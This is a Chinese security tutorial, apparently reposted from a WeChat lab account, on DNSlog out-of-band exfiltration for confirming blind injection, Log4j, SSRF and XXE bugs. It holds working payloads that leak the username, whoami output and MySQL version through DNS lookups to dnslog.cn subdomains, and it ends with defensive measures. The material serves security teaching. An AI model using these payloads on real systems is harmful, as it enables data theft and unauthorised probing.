网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
DNSlog 是一种利用 DNS 查询记录 来检测和获取目标系统信息的技术,常用于 安全测试 和 漏洞验证,尤其是在 无回显漏洞(Blind Vulnerability)的场景下。(DNS 查询是几乎不受限制的:大多数服务器允许外发 DNS 请求,即使防火墙严格限制 HTTP/HTTPS 流量。DNS 查询会被记录:当目标服务器向一个 受控 DNS 服务器 发起查询时,攻击者可以查看查询日志,从而确认漏洞是否存在。)
通过DNSLOG服务地址将DNS解析记录外带到DNS日志平台的解析记录上,常用于网页无回显的场景可以利用这样的方式确认漏洞是否存在【比如 SQL注入盲注、Log4j漏洞验证、SSRF 网页无回显漏洞验证、XML 外部实体注入等】
将需要查询的值和域名拼接起来,向域名发送请求,DNS在解析的时候会留下日志,读取日志便可以获取信息,通过主机进行的DNS解析请求,解析请求会通过DNSLog进行记录解析记录。
dnslog平台
http://www.dnslog.cn/
环境1(Windows)
变量.dnslog测试地址
APPDATA% : 列出应用程序数据的默认存放位置
CD% : 列出当前目录。
CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名
CMDCMDLINE% : 列出启动当前cmd.exe所使用的命令行
CMDEXTVERSION% : 命令出当前命令处理程序扩展版本号
测试命令(dnslog的子域名)
ping mitian.mxz8fq.dnslog.cn
ping %username%.2jh2a2.dnslog.cn
`whoami`
`pwd`
ping `whoami`.vpevff.dnslog.cn
ping $(whoami).vpevff.dnslog.cn
secure_file_priv
为空SHOW VARIABLES LIKE '%secure%';
SELECT LOAD_FILE(CONCAT('\\', (SELECT VERSION()), '.p8uzah.dnslog.cn\mt'));
1、限制外发 DNS 请求(防火墙规则、安全组策略)
2、监控异常 DNS 查询(如大量请求到陌生域名)
3、禁用危险协议(如 XXE 禁用外部实体)
4、使用 DNSSEC(防止 DNS 欺骗攻击)
原文始发于微信公众号(弥天安全实验室):【攻防实践】不同场景下的DNS外带测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论